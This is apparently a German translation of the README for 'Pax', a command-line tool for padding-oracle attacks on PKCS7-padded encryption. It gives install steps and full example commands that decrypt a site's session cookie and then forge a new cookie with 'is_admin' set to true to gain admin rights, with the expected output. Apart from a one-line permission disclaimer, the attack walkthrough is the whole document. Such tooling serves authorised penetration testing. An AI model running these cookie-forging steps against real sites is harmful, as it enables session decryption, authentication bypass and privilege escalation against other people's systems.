
💀 🔓 CLI-Tool für PKCS7 Padding-Oracle-Angriffe
Padding-Orakel für Spaß und Gewinn ausnutzen!
Pax (PAdding oracle eXploiter) ist ein Tool zum Ausnutzen von Padding-Orakeln, um Folgendes zu erreichen:
Dies kann verwendet werden, um verschlüsselte Sitzungsinformationen offenzulegen und oft Authentifizierung zu umgehen, Berechtigungen zu erhöhen und Code remote auszuführen, indem benutzerdefinierter Klartext verschlüsselt und an den Server zurückgeschrieben wird.
Wie immer sollte dieses Tool nur auf Systemen verwendet werden, die Ihnen gehören und/oder für die Sie die Erlaubnis zum Testen haben!
Laden Sie es von den Releases herunter, oder installieren Sie es mit Go:
go get -u github.com/liamg/pax/cmd/pax
Wenn Sie ein vermutetes Orakel finden, bei dem die verschlüsselten Daten in einem Cookie namens SESS gespeichert sind, können Sie Folgendes verwenden:
pax decrypt --url https://target.site/profile.php --sample Gw3kg8e3ej4ai9wffn%2Fd0uRqKzyaPfM2UFq%2F8dWmoW4wnyKZhx07Bg%3D%3D --block-size 16 --cookies "SESS=Gw3kg8e3ej4ai9wffn%2Fd0uRqKzyaPfM2UFq%2F8dWmoW4wnyKZhx07Bg%3D%3D"
Dies wird hoffentlich etwas Klartext liefern, vielleicht so etwas wie:
{"user_id": 456, "is_admin": false}
Es sieht so aus, als könnten Sie hier Ihre Berechtigungen erhöhen!
Sie können dies versuchen, indem Sie zunächst Ihre eigenen verschlüsselten Daten generieren, die das Orakel wieder in einen hinterhältigen Klartext entschlüsselt:
pax encrypt --url https://target.site/profile.php --sample Gw3kg8e3ej4ai9wffn%2Fd0uRqKzyaPfM2UFq%2F8dWmoW4wnyKZhx07Bg%3D%3D --block-size 16 --cookies "SESS=Gw3kg8e3ej4ai9wffn%2Fd0uRqKzyaPfM2UFq%2F8dWmoW4wnyKZhx07Bg%3D%3D" --plain-text '{"user_id": 456, "is_admin": true}'
Dies wird einen weiteren base64-codierten Satz verschlüsselter Daten ausgeben, vielleicht so etwas wie:
dGhpcyBpcyBqdXN0IGFuIGV4YW1wbGU=
Jetzt können Sie Ihren Browser öffnen und den Wert des SESS-Cookies auf den obigen Wert setzen. Wenn Sie die ursprüngliche Orakelseite laden, sollten Sie sehen, dass Sie auf Admin-Ebene angehoben wurden.
Die folgenden Anleitungen erklären diesen Angriff hervorragend: